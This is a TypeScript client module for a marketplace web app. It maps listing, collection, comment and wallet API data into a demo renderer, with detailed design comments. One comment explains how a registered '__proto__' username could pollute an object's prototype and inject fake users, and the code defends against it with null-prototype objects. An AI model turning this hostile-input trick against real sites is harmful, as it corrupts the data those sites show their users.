export function mapCollectionItemRow(row: ApiCollectionItemRow): { listing: DemoListing; user: DemoUser } | null {
  if (!RENDERABLE_CATEGORIES.has(row.item.category)) return null;
  const user = mapSellerToUser(row.owner);
  const listing: DemoListing = {
    // "coll-" prefixed: user_collections ids are UUIDs from a different table
    // than listings.id, but prefixing (rather than trusting them to never
    // collide) makes that guarantee explicit instead of assumed.
    id: "coll-" + row.item.id,
    title: row.item.title,
    description: row.item.description ?? "",
    condition: row.item.condition ?? "",
    image: safeUrl(row.item.images?.[0]),
    images: (row.item.images ?? []).map(safeUrl).filter((u) => u.length > 0),
    declaredValue: row.item.estimatedValue ?? 0,
    category: row.item.category,
    acceptsCash: false,
    acceptsItems: false,
    acceptsHybrid: false,
    collectionOnly: true,
    seller: user.handle,
    fairVotes: 0,
    overVotes: 0,
    likes: 0,
    buzzing: false,
    want: undefined,
    comments: [],
    commentCount: 0,
  };
  return { listing, user };
}

/** Minimal shape of one GET /api/collections/user/:userId row
 *  (api-server/src/routes/collections.ts's toCollectionResponse), trimmed to
 *  the fields mapPublicCollectionRow below reads. Unlike ApiCollectionItemRow
 *  above, this shape has no `owner` sub-object at all (it is a flat,
 *  unauthenticated response reused verbatim across several public routes —
 *  see collections.ts's own comment on toCollectionResponse) — the owner is
 *  already known by the caller (profileFixups.ts already has the handle it
 *  is fetching for) and is threaded in separately, not read off the row. */
export interface PublicCollectionRow {
  id: string;
  listingId: string | null;
  /** null for a row never linked to a listing (a pure collection-only
   *  piece). GET /api/collections/user/:userId already excludes
   *  PUBLICLY_HIDDEN_LISTING_STATUSES (removed/rejected) server-side
   *  (collections.ts:34,:655-659), so those two values never reach here. */
  listingStatus: string | null;
  title: string;
  imageUrl: string | null;
  estimatedValue: string | number | null;
  category: string;
}

/** The plain object shape data.js's own collectionFor(handle) expects inside
 *  PUBLIC_EXTRAS[handle] (data.js:426-468's fixture rows are exactly this
 *  shape) — see the bridgeScriptSource comment on __gbzMergeCollectionExtra
 *  for why this, and not DemoListing/LISTINGS, is mapPublicCollectionRow's
 *  target. `lid` is omitted unless the row is safe to click through to a
 *  real listing (see the mapper's own comment). */
export interface PublicCollectionExtraItem {
  id: string;
  title: string;
  image: string;
  value: number;
  cat: string;
  status: "PENDING" | "SOLD" | "TRADED" | "IN COLLECTION";
  lid?: string;
}

/** listingStatus -> the PUBLIC_EXTRAS status label it becomes. `active` is
 *  deliberately ABSENT: an active-listing row is already on LISTINGS via
 *  PART (b)'s own GET /users/:id/listings merge (profileFixups.ts,
 *  applyProfileListingsFixup) — mapping it here too would double-count it in
 *  collectionFor(handle)'s concatenation of `live` + PUBLIC_EXTRAS.
 *
 *  🔴 EVERY OTHER STATUS THE SERVER COUNTS MUST MAP, or the count chip
 *  overstates the grid by exactly the skipped rows — the same defect this
 *  mapper exists to close (the delta re-review measured an 8 chip over 5
 *  cards when paused/under_review/unlisted returned null here; itemCount
 *  excludes only PUBLICLY_HIDDEN_LISTING_STATUSES, so this table's coverage
 *  is coupled to that filter). paused/under_review/unlisted are OFF-MARKET
 *  but still owned — "IN COLLECTION" is precisely their bucket ("unlist but
 *  keep it in my collection" is an ordinary action: listings.ts take-down
 *  sets `unlisted`), and mobile renders all of them (HIDDEN_IN_GRID drops
 *  only removed/rejected). Only removed/rejected stay absent, matching the
 *  server's hidden set. */
const PUBLIC_COLLECTION_STATUS_LABEL: Readonly<Record<string, "PENDING" | "SOLD" | "TRADED" | "IN COLLECTION">> = {
  pending: "PENDING",
  sold: "SOLD",
  traded: "TRADED",
  paused: "IN COLLECTION",
  under_review: "IN COLLECTION",
  unlisted: "IN COLLECTION",
};

/**
 * Maps one GET /api/collections/user/:userId row onto a PUBLIC_EXTRAS entry
 * (F3, adversarial review, card 1218200003007957): the real fix for the
 * Collection section's grid only ever showing whatever collectionFor(handle)
 * could piece together from active LISTINGS plus a handful of demo-only
 * PUBLIC_EXTRAS rows. See __gbzMergeCollectionExtra's own header
 * (floorTransport.ts's bridgeScriptSource) for why PUBLIC_EXTRAS, not
 * LISTINGS, is the merge target.
 *
 * Returns null for a row this mapper does not surface — see
 * PUBLIC_COLLECTION_STATUS_LABEL's own comment for `active` and the other
 * excluded statuses.
 */
export function mapPublicCollectionRow(row: PublicCollectionRow): PublicCollectionExtraItem | null {
  const status = row.listingStatus === null ? "IN COLLECTION" : PUBLIC_COLLECTION_STATUS_LABEL[row.listingStatus];
  if (!status) return null;

  const item: PublicCollectionExtraItem = {
    id: row.id,
    title: row.title,
    image: safeUrl(row.imageUrl),
    value: Number(row.estimatedValue) || 0,
    cat: row.category,
    status,
  };
  // `lid` only when the floor can actually open it — same unguarded
  // CATEGORIES.find(...) crash at click-time mapCollectionItemRow's own
  // comment names, guarded here the same way (RENDERABLE_CATEGORIES).
  if (row.listingId && RENDERABLE_CATEGORIES.has(row.category)) item.lid = row.listingId;
  return item;
}

/** The API's own hard cap per request (listings.ts clampQueryInt, max 100). */
export const LISTINGS_PAGE_SIZE = 100;
/**
 * Rows each later page re-reads from the page before. The server orders by
 * featured, then newest, and caches each page for 30 s under its own key, so
 * two pages can describe the set at different moments: a listing created in
 * between repeats a row (kept once, below), and a listing sold or removed in
 * between shifts the next row back past the boundary, where a page that
 * started exactly at the boundary would skip it. Starting each later page this
 * many rows early covers that many removals.
 */
export const LISTINGS_PAGE_OVERLAP = 10;
/** A bound on boot time, not a product limit: 20 pages (1,810 listings with
 *  the overlap) before the floor stops asking, and it says so when it does.
 *  Raise it when the catalog approaches it. */
export const LISTINGS_MAX_PAGES = 20;

/**
 * Every active listing, a page at a time.
 *
 * WHEN THE SERVER HAS RUN OUT. It applies a page's LIMIT in SQL and only then,
 * for a SIGNED-IN viewer, drops the listings of sellers the viewer has blocked
 * or been blocked by (routes/listings.ts, "Mutual-block"). So for a guest a
 * short page is the end, and for a signed-in viewer a page can come back short
 * with more behind it, so only an empty page ends it. (A page the block filter
 * emptied entirely would end it early: that takes one blocked seller holding a
 * whole page's worth of listings in a row.)
 *
 * THE FIRST TWO PAGES GO OUT TOGETHER. app.js paints only after this resolves,
 * and the floor has needed a second page since 2026-08-23 (177 active on
 * 2026-09-27); asking for it only after the first answered added about half a
 * second to a phone's blank screen. When the first page turns out to be the
 * end, the second answer is simply not read.
 *
 * FAILURES. The first page failing in any way throws (installFloorListings
 * fails closed, as it always has). A later page failing in any way (an error
 * status, a network error, a body that is not a list) keeps what already
 * loaded and says so, because a real partial floor beats no floor.
 *
 * A listing seen twice (the overlap, or a set that shifted) is kept once.
 */
export async function fetchAllListingRows(
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  opts: { signedIn?: boolean } = {},
): Promise<ApiListingRow[]> {
  const rows: ApiListingRow[] = [];
  const seen = new Set<string>();
  const stride = LISTINGS_PAGE_SIZE - LISTINGS_PAGE_OVERLAP;
  const pageUrl = (page: number) =>
    page === 0 ? `/api/listings?limit=${LISTINGS_PAGE_SIZE}` : `/api/listings?limit=${LISTINGS_PAGE_SIZE}&offset=${page * stride}`;
  // Settled, so a second page nobody reads (or one that fails while the first
  // is failing too) can never surface as an unhandled rejection.
  type Answer = { res: Response } | { err: unknown };
  const ask = (page: number): Promise<Answer> =>
    authFetch(pageUrl(page)).then((res) => ({ res }), (err: unknown) => ({ err }));
  const firstTwo = [ask(0), ask(1)];
  for (let page = 0; page < LISTINGS_MAX_PAGES; page++) {
    const answer = await (page < firstTwo.length ? firstTwo[page] : ask(page));
    let batch: ApiListingRow[];
    if (page === 0) {
      if ("err" in answer) throw answer.err;
      if (!answer.res.ok) throw new Error(`GET /api/listings failed: ${answer.res.status} ${answer.res.statusText}`);
      const body: unknown = await answer.res.json();
      if (!Array.isArray(body)) throw new Error("GET /api/listings did not answer a list");
      batch = body as ApiListingRow[];
    } else {
      try {
        if ("err" in answer) throw answer.err;
        if (!answer.res.ok) throw new Error(String(answer.res.status));
        const body: unknown = await answer.res.json();
        if (!Array.isArray(body)) throw new Error("not a list");
        batch = body as ApiListingRow[];
      } catch (err) {
        const why = err instanceof Error ? err.message : String(err);
        console.warn(`[web-install] listings page ${page + 1} failed (${why}); installing the ${rows.length} already loaded`);
        return rows;
      }
    }
    for (const row of batch) {
      const id = row?.listing?.id;
      if (typeof id === "string") {
        if (seen.has(id)) continue;
        seen.add(id);
      }
      rows.push(row);
    }
    if (batch.length === 0 || (!opts.signedIn && batch.length < LISTINGS_PAGE_SIZE)) return rows;
  }
  console.warn(
    `[web-install] listings: stopped at the ${LISTINGS_MAX_PAGES}-page bound before the server said it had run out; installing ${rows.length}. Raise LISTINGS_MAX_PAGES.`,
  );
  return rows;
}

/**
 * Fetches the real floor listings, maps them onto Blake's shape, and installs
 * them — plus the category counts and the caller's own collection, plus
 * clearing every other fixture (see bridgeScriptSource) — via the bridge
 * script's window.__gbzInstallFloor. Must run AFTER data.js has executed
 * (LISTINGS/USERS/bridge must exist) and BEFORE app.js executes (its
 * bottom-of-file render() call is what actually paints).
 *
 * FAILS CLOSED (recon 16, L3-1 + L4-7 + L4-8). Throws — never calls the
 * bridge — when the LISTINGS fetch fails OR fewer than MIN_LISTINGS_TO_INSTALL
 * real rows come back. WebInstallHost does not load app.js when this throws,
 * so Blake's 24 fabricated demo listings / 22 fabricated users can never
 * render as if they were the real marketplace, and the LISTINGS[19]-indexing
 * brick (see MIN_LISTINGS_TO_INSTALL) can never be reached — app.js is simply
 * never given a short array to index into.
 *
 * @param currentUsername the real, currently authenticated user's own
 *   username (AuthContext's `user.username`), or `null` for a guest. Used
 *   only to find that user's OWN rows among the listings just fetched, so
 *   their closet (MY_COLLECTION) isn't left empty next to their own live
 *   listings — see the gap log below for what this does NOT cover.
 * @returns `userIds` (handle -> users.id) is exposed alongside `count` purely
 *   as data this call already built for its own use — ratingFixups.ts needs
 *   it to call GET /api/reviews/summary/:userId per profile. Not a second
 *   fetch: the same map mapListingRow already builds each user from.
 */
export async function installFloorListings(
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  currentUsername: string | null,
  currentIsAdmin: boolean = false,
): Promise<{ count: number; userIds: Record<string, string> }> {
  const bridge = (
    window as unknown as {
      __gbzInstallFloor?: (
        l: DemoListing[],
        u: Record<string, DemoUser>,
        myCollection: DemoCollectionItem[],
        categoryCounts: Record<string, number>,
        boardRow: { give: string; get: string },
        myDisplayHandle: string | null,
        categoryTiles: Record<string, string>,
        currentIsAdmin: boolean,
      ) => void;
    }
  ).__gbzInstallFloor;
  if (typeof bridge !== "function") {
    throw new Error("installFloorListings: bridge script has not run yet (__gbzInstallFloor missing)");
  }

  // limit=100 (not 30): the category surface (#/c/:slug, renderCategoryPage)
  // filters this SAME installed LISTINGS array by l.category — it gets no
  // fetch of its own. Verified live 2026-08-23: at limit=30 two real
  // categories (electronics, musical-instruments) got zero rows and would
  // have shown Blake's honest-but-empty "nothing in the demo set yet" state
  // despite real listings existing. 100 is also the API's own hard cap
  // (listings.ts:420, Math.min(Number(limit), 100)) and covered every one of
  // the 8 real production categories in that same verification (101 total
  // real listings today; only the 101st, offset-100th row is left out).
  //
  // ⚠️ AND 100 IS NOT THE WHOLE FLOOR ANY MORE. One page of 100 left every
  // older listing off the floor: 77 of 177 active on 2026-09-27, everything
  // created before 2026-08-07, including 44 of the 72 collectibles. So page
  // by offset until the server has run out (fetchAllListingRows says when
  // that is: a short page for a guest, an empty one for a signed-in viewer).
  // The first page keeps its exact old URL; later pages add &offset=.
  const rows = await fetchAllListingRows(authFetch, { signedIn: currentUsername !== null });

  // BEFORE the count check, deliberately: a row Blake's renderer cannot render
  // is not an installable listing, so it must not be counted toward the
  // threshold that decides whether we install at all. Filtering after the
  // check would let 20 rows pass the gate and then install 15.
  const renderableRows = rows.filter((row) => RENDERABLE_CATEGORIES.has(row.listing?.category));
  const droppedCount = rows.length - renderableRows.length;
  if (droppedCount > 0) {
    // Named, not silent: a dropped row is invisible on the floor, and the only
    // way to answer "why is my listing missing" is for the drop to say so.
    const droppedCategories = Array.from(new Set(rows.map((r) => r.listing?.category).filter((c) => !RENDERABLE_CATEGORIES.has(c))));
    console.warn(
      `[web-install] dropped ${droppedCount} listing(s) whose category is not renderable: ${droppedCategories.join(", ")} ` +
        `(app.js:827 dereferences CATEGORIES.find(...) with no fallback — see RENDERABLE_CATEGORY_SLUGS)`,
    );
  }

  if (renderableRows.length < MIN_LISTINGS_TO_INSTALL) {
    throw new Error(
      `only ${renderableRows.length} real listing(s) available, need at least ${MIN_LISTINGS_TO_INSTALL} ` +
        `(app.js indexes fixed positions up to LISTINGS[19] on the signed-in home — see MIN_LISTINGS_TO_INSTALL)`,
    );
  }

  const mappedListings: DemoListing[] = [];
  /* 🔴 Object.create(null), NOT {} — these two are keyed by a SELLER-CONTROLLED
     handle. On a plain object literal, assigning the key "__proto__" does not
     create a key at all: it invokes Object.prototype's __proto__ SETTER and
     replaces the accumulator's prototype with the user object. The bridge's own
     'for (var handle in mappedUsers)' then walks the prototype chain and copies
     every DemoUser field into USERS as though each were a separate person —
     measured at 14 garbage handles ("id", "handle", "avatar", "initials", ...),
     which topCollectors() then ranks on the GUEST homepage, no auth required.
     A username only has to match the server's own pattern, which carries no
     reserved list (api-server/src/lib/username.ts), so this is a registerable
     name rather than a synthetic one.

     A null-prototype object has no such setter, so the handle lands as an
     ordinary own key and the installed count stays at one user, correctly.

     userIds is not vulnerable by that exact route — its values are strings and
     the __proto__ setter ignores a non-object — but it is keyed by the same
     untrusted handle in the same loop, so it gets the same treatment rather
     than resting on a value-type coincidence. */
  const mappedUsers: Record<string, DemoUser> = Object.create(null);
  const userIds: Record<string, string> = Object.create(null);
  /* One representative image per renderable category, first-in-feed-order —
     see bridgeScriptSource's own comment on the honest-empty ("") decision
     this feeds. A plain object, unlike mappedUsers/userIds above: the key is
     `listing.category`, which renderableRows has already constrained to
     RENDERABLE_CATEGORY_SLUGS (a fixed 9-slug allowlist), never a
     seller-controlled string the way a handle is. The VALUE is
     `listing.image`, already safeUrl()'d by mapListingRow above — never the
     row's raw field — so a hostile image URL can only ever produce "" here,
     the same honest miss as a category with no image at all. */
  const categoryTiles: Record<string, string> = {};
  for (const row of renderableRows) {
    const { listing, user } = mapListingRow(row);
    mappedListings.push(listing);
    mappedUsers[user.handle] = user;
    userIds[user.handle] = user.id;
    if (!categoryTiles[listing.category] && listing.image) {
      categoryTiles[listing.category] = listing.image;
    }
  }

  // Category counts (recon 19 §1a hybrid: CATEGORIES[].count). Best-effort —
  // a failure here must not block the install; the mosaic's count is
  // cosmetic, not load-bearing the way LISTINGS is. A missing/failed fetch
  // leaves every count at 0 (an honest "we don't know yet", not Blake's
  // invented totals — never silently re-adopts his fixture numbers).
  /* Null prototype for the same reason as mappedUsers above: keyed by cat.id
     straight off the wire, then read back by slug inside the bridge. */
  const categoryCounts: Record<string, number> = Object.create(null);
  try {
    const catRes = await authFetch("/api/categories");
    if (catRes.ok) {
      const body = (await catRes.json()) as { categories?: ApiCategoryRow[] };
      for (const cat of body.categories ?? []) {
        if (typeof cat.id === "string" && typeof cat.listing_count === "number") {
          categoryCounts[cat.id] = cat.listing_count;
        }
      }
    }
  } catch {
    // leave categoryCounts empty — the bridge defaults every slug to 0
  }

  /* The ACTIVE rows, derived from the floor feed with no second call. These
     are the FALLBACK now rather than the whole story: GET /api/collections is
     fetched below and merged over them, which is what closes the old gap log's
     PENDING/SOLD/TRADED/"IN COLLECTION" hole and its
     8-server-status-to-5-UI-word mapping.

     Kept, rather than deleted in favour of the endpoint, because the endpoint
     is allowed to fail — see the 503 note below — and ACTIVE-only beats an
     empty closet standing next to the same user's own live listings, which is
     the bug the task brief calls out as ours. */
  const myDisplayHandle = currentUsername;
  const mappedMyCollection: DemoCollectionItem[] = myDisplayHandle
    ? mappedListings
        .filter((l) => l.seller === myDisplayHandle)
        .map((l) => ({
          id: "my-" + l.id,
          title: l.title,
          image: l.image,
          value: l.declaredValue,
          status: "ACTIVE",
          chips: [l.acceptsCash && "SALE", l.acceptsItems && "TRADE", l.acceptsHybrid && "HYBRID"].filter(
            (c): c is string => typeof c === "string",
          ),
          lid: l.id,
        }))
    : [];

  /* GET /api/collections — the owner's real closet, all eight listing statuses
     plus standalone pieces that were never listings.

     ⚠️ Best-effort, and its failure mode is DELIBERATE on the server side. That
     route returns 503 rather than serve a partial collection, and its own
     comment calls Replit PG read failures "a KNOWN recurring mode on this
     deployment". So a miss here is an ordinary state, not an exception, and the
     honest fallback is the ACTIVE-only rows above — never a half-collection,
     which on a trade surface reads as "these are all the items you own".

     🪤 Requires auth. Guarded on myDisplayHandle for the same reason the derived
     rows are: a guest has no closet, and asking would just 401 on every boot. */
  let myCollection = mappedMyCollection;
  if (myDisplayHandle) {
    try {
      const colRes = await authFetch("/api/collections");
      if (colRes.ok) {
        const body = (await colRes.json()) as ApiCollectionItem[];
        if (Array.isArray(body)) myCollection = mergeMyCollection(mappedMyCollection, mapMyCollection(body));
      }
    } catch {
      // keep the derived ACTIVE rows — see the 503 note above
    }
  }

  // Collection-only pieces (GET /api/feed/collection-items — task target #2:
  // "the endpoint has been sitting there unused"). Best-effort, same posture
  // as categoryCounts above: a failure here must not block the floor
  // install — the "More from Collections" rails and #/collections'
  // highlight tiles are a bonus shelf, not load-bearing the way LISTINGS is.
  // Computed AFTER mappedMyCollection and appended to a SEPARATE array below
  // (never spliced into mappedListings itself) so it can never shift the
  // fixed LISTINGS[0..19] positions app.js's signed-in home indexes into —
  // the exact assumption MIN_LISTINGS_TO_INSTALL exists to protect (see its
  // own comment) — and so a collection-only piece can never count toward
  // that 20-real-listing threshold.
  const mappedCollectionItems: DemoListing[] = [];
  try {
    const collRes = await authFetch("/api/feed/collection-items?limit=100");
    if (collRes.ok) {
      const collRows = (await collRes.json()) as ApiCollectionItemRow[];
      for (const row of collRows) {
        const mapped = mapCollectionItemRow(row);
        if (!mapped) continue; // unrenderable category — see mapCollectionItemRow
        mappedCollectionItems.push(mapped.listing);
        // Real data always wins, but never OVERWRITES a seller's entry that
        // already came from their own for-sale listings above — both source
        // rows describe the same real user, so there's nothing to reconcile.
        if (!mappedUsers[mapped.user.handle]) mappedUsers[mapped.user.handle] = mapped.user;
        /* ...and their id, so Message on a collection piece can address the thread.
           Never overwrites a seller's id recorded above: same person either way. */
        if (mapped.user.id && !userIds[mapped.user.handle]) userIds[mapped.user.handle] = mapped.user.id;
      }
    }
  } catch {
    // leave mappedCollectionItems empty — "not for sale" rails degrade to
    // absent, matching Blake's own qualify-then-show gates for an empty rail
  }

  /* ══════════════════════════════════════════════════════════════════════
     THE SIGNED-IN VISITOR'S OWN ROW — without it their profile is a blank page.
     ══════════════════════════════════════════════════════════════════════

     🔴 REPORTED BY TYLER, staging 2026-08-30, signed in as a brand-new account:
     "once the account is created there is no actual profile page for that user."
     #/profile rendered the nav and the footer and NOTHING between them.

     `mappedUsers` above is built from SELLERS — one row per person who has a
     listing on the floor. Someone who has never listed anything is therefore
     absent from it, and Blake's renderProfile opens with

         const u = USERS[store.me];
         if (!u) return "";                          (app.js:1195-1197)

     so the whole view returns an empty string. renderWallet and renderRepDash
     open the same way. Every new account lands in that state and stays there
     until it lists something — which is exactly backwards, since the profile is
     where a new person goes to find out what they now have.

     🪤 WHY THE OBVIOUS PLACE IS THE WRONG ONE. __gbzMergeUsers deliberately
     refuses to add the visitor (`if (uh === me) continue;`) and its note is
     right: a row created THERE lands after __gbzInstallWallet has already run
     its `if (me && USERS[me])` enrichment and skipped, so the page would paint
     "0 PTS / Level 1 of 60 / 0-day streak" beside the REAL spendable balance the
     wallet fetch installed — a screen disagreeing with itself about someone's
     own points. That note calls showing nothing "honest", and against a row of
     invented zeros it is.

     This is the other place, and the ordering is what makes it safe: the row is
     in `mappedUsers` BEFORE the bridge installs anything, so installWallet's
     guard PASSES and overwrites lvl/pts/ptsNext/streak/points with the real
     values it was already holding and previously discarded. Nothing invented,
     nothing to contradict.

     🪤 AND IT MUST BE A COMPLETE DemoUser, never a partial one. Three of
     Blake's renderers dereference these fields unguarded — renderProfile's
     `u.points.toUpperCase()`, renderWallet's and renderRepDash's
     `u.pts.toLocaleString()` — so a half-built row does not render a blank
     cell, it throws, returns nothing, leaves app.innerHTML unassigned, and
     strands the visitor on the PREVIOUS view with dead controls. Worse than the
     blank page this fixes. mapSellerToUser is reused rather than hand-rolling
     an object literal precisely so the shape cannot drift out of that contract.

     The defaults it fills are honest, not uniformly zero: trades and ratings
     really are 0 for a brand-new account, but sales/followers/following are
     null (mapSellerToUser's own HONEST UNKNOWN, not an honest zero — see its
     header above) rendering as UNKNOWN_METRIC's em dash, plus a blank
     memberSince that Blake's own `"".split(" ").pop()` renders safely.

     NEVER OVERWRITES. Someone who has listed already has a real seller row with
     their true trade count — the presence check keeps it, same rule as the
     collection-items merge directly above. */
  if (myDisplayHandle && currentUsername && !mappedUsers[myDisplayHandle]) {
    mappedUsers[myDisplayHandle] = mapSellerToUser({
      username: currentUsername,
      displayName: null,
      avatar: null,
      traderLevel: null,
      tradeCount: null,
    });
  }

  /* The floor ORDER is not applied here. LISTINGS stays in the server's order
     (collection pieces after every listing, as before), because fixed-position
     rails, search, "More From", Top Collections and the profile grid all read
     it. app.js's browseItems applies the floor order (floorOrder.ts, Blake
     2026-09-27) through this hook, after its own category and deal-type
     filters. Installed with the listings, before app.js loads and paints.
     It promotes only the listings installed here: a row merged in later (a
     sold favorite, a route-fallback item, a search hit) keeps its place at
     the end, because nothing on it says whether it is still for sale. */
  const installedIds = new Set(mappedListings.map((l) => l.id));
  /* On the floor = installed here, or a collection piece. New Arrivals reads
     it too, so a sold favorite merged after boot is never shown as new. */
  const onFloor = (l: DemoListing): boolean => l.collectionOnly === true || installedIds.has(l.id);
  const hooks = window as unknown as {
    __gbzOrderFloor?: (items: DemoListing[]) => DemoListing[];
    __gbzOnFloor?: (l: DemoListing) => boolean;
  };
  hooks.__gbzOnFloor = onFloor;
  hooks.__gbzOrderFloor = (items) => orderFloor(items, onFloor);
  bridge([...mappedListings, ...mappedCollectionItems], mappedUsers, myCollection, categoryCounts, BOARD_PLACEHOLDER_ROW, myDisplayHandle, categoryTiles, currentIsAdmin);
  return { count: mappedListings.length, userIds };
}

/* ============================================================================
 * Task target #3 — #/listing/:id: real comments.
 *
 * Aligned to api-server/src/routes/listing-og.ts's own field mapping
 * (buildListingPageModel, lines 328-332: `(extras.comments ?? []).map(c =>
 * ({ author: c.authorUsername ?? "trader", body: c.body, upvotes: c.upvotes
 * }))`), the SSR crawl layer's read of the SAME listing_comments table —
 * not a second, independently-derived shape. The one deliberate difference:
 * that SSR page hand-fetches only the top 3 comments (its own DB query,
 * `.limit(3)`, listing-og.ts:540) plus a separate COUNT query, because it's
 * a server-rendered crawl page with its own cost budget. The CLIENT-side
 * GET /api/comments/:listingId used here (comments.ts:193-238) returns the
 * complete list with no limit — Blake's own renderCommentsModal wants the
 * full set, not a 3-deep preview, and commentCount can simply be the
 * fetched array's length rather than a second query. Same sort order on
 * both sides (`desc(upvotes), createdAt` — comments.ts:205, listing-og.ts:539),
 * so the two surfaces still agree on which comments rank first; the client
 * one just doesn't truncate.
 * ==========================================================================*/

/** Minimal shape of one GET /api/comments/:listingId row (comments.ts:197-205
 *  — the full listingComments row plus a joined author). Only the fields
 *  Blake's comment renderers read (renderDetail lines 945-958, and its
 *  identical shape in renderCommentsModal / renderCard's single-comment
 *  preview) are declared.
 *
 *  🔑 THE AUTHOR BLOCK IS NOW WIDER THAN THAT RULE, deliberately. The route
 *  selects `author: { id, username, avatar, traderLevel }` (comments.ts:200)
 *  and three of those four were being thrown away. They are declared here
 *  because mapCommentAuthors below turns the same row into a USERS entry, and
 *  a field that is on the wire is the difference between a real avatar and a
 *  "?" — see that mapper's header. Everything the route returns but nobody
 *  reads (dealId, parentCommentId, downvotes, isHidden, and the redundant
 *  comment.authorId copy of author.id) stays undeclared. comment.id and
 *  likedByMe joined 2026-09-10: the comment heart votes by id and paints the
 *  viewer's own like (commentLikes.ts). */
export interface ApiCommentRow {
  comment: {
    /** listing_comments.id — what POST /api/comments/:commentId/vote takes. */
    id?: string;
    body: string;
    upvotes: number;
    createdAt: string;
  };
  /** Whether THIS viewer's vote row exists (optionalAuth: always false for a guest). */
  likedByMe?: boolean;
  author: {
    id: string;
    username: string;
    /** Nullable column (lib/db/src/schema/users.ts). */
    avatar: string | null;
    /** notNull enum, defaulted to "rookie" (users.ts) — never absent. */
    traderLevel: string;
  };
}

/** Blake's comment shape (data contract §1: `{by, text, when, likes}` —
 *  data.js's own LISTINGS[].comments fixture rows). */
export interface DemoComment {
  by: string;
  text: string;
  when: string;
  likes: number;
  /** The real comment's id — absent on data.js and tour fixture rows, whose hearts stay local. */
  id?: string;
  /** The viewer's own like, from likedByMe. */
  liked?: boolean;
}

/* ══════════════════════════════════════════════════════════════════════════
   THE WALLET (transactional lane, Asana 1217761486129536)

   renderWallet() reads TEN WALLET fields plus FOUR gamification fields off
   USERS[store.me], and it is the most absence-hostile surface in the lane:
   absence does not fall back here, it THROWS. Four of those reads are bare
   dereferences (.toLocaleString(), .length, .connected) that end the render
   and leave app.innerHTML unassigned.

   So the rule this whole section is built around: the object handed to the
   bridge is FULLY SHAPED. Every field present, every array an array, every
   number a number, every shaped-empty "" and never null or undefined.

   🔴 THREE THINGS ARE DELIBERATELY LEFT EMPTY, each for a stated reason
   rather than a TODO. Blake wrote honest empty states for all of them, so an
   empty ARRAY renders correctly; it is undefined that breaks them.

     cards      An endpoint DOES exist, GET /api/stripe/customers/
                :customerId/payment-methods. It is unreachable on a page load:
                the only way to obtain :customerId is POST /api/stripe/
                customers, which MINTS a Stripe customer record when the user
                has none. Creating a billing object as a side effect of
                painting a screen is not a read. Blake's own empty state
                ("No payment card saved") is correct until a GET exists.

     bank.institutionName / .last4 / .connectedAt
                No source. stripe/connect.ts exposes enablement flags only:
                no external_account, no bank_name, no last4 anywhere. So
                connected is real (payoutsEnabled) and the three display
                strings stay "". Inventing an institution name and last4
                would be a plausible value with no origin.

     level 60   nextLevelPoints is null at MAX_LEVEL because there is no next
                level, so ptsNext equals pts. Blake's bar divides by
                (ptsNext - pts), so a maxed user gets width: NaN% and a
                "0 to level 61" line. Both are cosmetic, and both are HIS UI
                lacking a maxed state. The alternative is minting a 61st
                threshold, which is the fabrication class. Hand it to Blake
                rather than paper over it.

   📌 The progress bar is a CONSTANT 65% regardless of what we send. With
   g = ptsNext - pts, his prevMin makes the denominator g/0.35 and the
   numerator g(0.65/0.35), so pct is 0.65 for every input. Verified against
   his own fixture (1450/2100 gives 65%). The bar carries no information. The
   one thing we owe it is g not equal to 0, which is why ptsNext must never
   equal pts outside the documented maxed case.
   ══════════════════════════════════════════════════════════════════════════ */

/** GET /api/users/me/wallet. The only REQUIRED call of the four. */
export interface ApiWalletResponse {
  pointsWallet: number;
  totalAccumulatedPoints: number;
  level: number;
  /** null at level 60: LEVEL_THRESHOLDS has no 61st entry. */
  nextLevelPoints: number | null;
  streakDays: number;
  /**
   * The SELLER-side held proceeds, in dollars — and the only canonical escrow
   * total on this response.
   *
   * Scoped and computed to match GET /api/stripe/payouts → pendingEscrowCents
   * exactly, by the route's own statement of intent (users.ts: "Identical scope
   * and math ... so the two agree"). It is NOT the sum of
   * `escrowTransactions[].amount`: that array carries BOTH roles, and a buyer's
   * held payment is money leaving them, not proceeds arriving.
   *
   * Optional so an older response — or any fixture written before this field
   * was read — still maps; absent reads as "no seller proceeds held", which is
   * what a wallet with no held sales genuinely has.
   */
  pendingEscrowTotal?: number;
  escrowTransactions: ApiEscrowTransaction[];
}

export interface ApiEscrowTransaction {
  id: string;
  listingTitle: string;
  /** Already role-aware, and already in DOLLARS on the wire. */
  amount: number;
  buyerId: string;
  sellerId: string;
  counterpartUsername: string;
  status: "held" | "released" | "refunded";
  createdAt: string;
  releasedAt?: string;
}

/** GET /api/stripe/payouts. */
export interface ApiPayoutsResponse {
  availableCents: number;
  payoutsEnabled: boolean;
  payouts: ApiStripePayout[];
}

export interface ApiStripePayout {
  id: string;
  amountCents: number;
  /** Stripe's own vocabulary: paid, pending, in_transit, canceled, failed. */
  status: string;
  arrivalDate: string;
  description: string | null;
}

/** GET /api/users/me/promo-credit. balanceCents is the LEDGER balance, net of
 *  burns and excluding expired rows, not the campaign's face value. It answers
 *  for ONE campaign, the oldest with a positive balance (api-server
 *  routes/users.ts), and its zero answer is null in every other field. */
export interface ApiPromoCredit {
  balanceCents: number;
  /** "list-and-earn-2026" or "founding-member-2026" today. */
  campaignId: string | null;
  issuedAt: string | null;
  expiresAt: string | null;
}

/** GET /api/users/me/shipping-coupons. Already filtered to unused + unexpired. */
export interface ApiShippingCoupon {
  id: string;
  discountType: "half" | "full";
  expiresAt: string;
}

export interface DemoCard {
  id: string;
  brand: string;
  last4: string;
  expiry: string;
  isDefault: boolean;
}

export interface DemoWallet {
  spendable: number;
  accumulated: number;
  availableCents: number;
  cards: DemoCard[];
  bank: { connected: boolean; institutionName: string; last4: string; connectedAt: string };
  promoCredit: { balance: number; redeemed: string; campaignId: string; expires: string };
  coupons: Array<{ id: string; label: string; badge: string; expires: string }>;
  escrowHeld: Array<{
    id: string;
    title: string;
    withHandle: string;
    amount: number;
    when: string;
    role: "buyer" | "seller";
  }>;
  escrowPast: Array<{ id: string; title: string; amount: number; status: string; when: string }>;
  payouts: Array<{ id: string; title: string; amount: number; status: string; when: string }>;
  /* ── Two fields Blake's own wallet has no socket for. Both land on WALLET
     through the bridge's `for (var wk in wallet)` copy and are read back by
     __gbzWalletFacts for the DOM fixups; app.js never enumerates WALLET's keys
     nor serializes it (grepped two shapes — 38 references, every one a named
     property read), so an extra key is inert to his renderer. Same posture as
     __gbzOfferId on a THREADS row. */
